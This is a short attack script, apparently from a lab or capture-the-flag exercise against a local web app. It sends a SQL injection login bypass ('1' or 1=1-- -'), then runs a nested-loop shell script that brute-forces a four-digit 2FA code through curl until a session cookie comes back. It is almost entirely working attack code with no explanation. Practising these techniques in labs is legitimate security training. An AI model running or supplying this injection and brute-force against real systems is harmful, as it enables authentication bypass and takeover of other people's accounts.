curl http://127.0.0.1:8888/auth/login -X POST -d "username=admin" -d "password=1' or 1=1-- -"

curl -s "http://127.0.0.1:8888/auth/verify-2fa" -X POST -d "2fa-code=7987"

curl -s "http://127.0.0.1:8888/dashboard"

#!/bin/sh

bandera="0"

for i in $(seq 0 9)
do
	for j in $(seq 0 9)
	do
		for k in $(seq 0 9)
		do
			for l in $(seq 0 9)
			do
				var="$i$j$k$l"
				contenido=$(curl -s "http://127.0.0.1:8888/auth/verify-2fa" -X POST -d "2fa-code=$var" -v 2>&1 | grep "session")

				if [[ -n "$contenido" ]]
				then
					echo "[+] Sucessful: $contenido follow /dashboard with cookie"
					bandera="1"
				fi
				if [[ "$bandera" -eq "1"  ]]
				then
					break
				fi

			done
			if [[ "$bandera" -eq "1"  ]]
                        then
                        	break
                        fi
		done
		if [[ "$bandera" -eq "1"  ]]
                then
                	break
                fi
	done
	if [[ "$bandera" -eq "1"  ]]
        then
		break
        fi
done
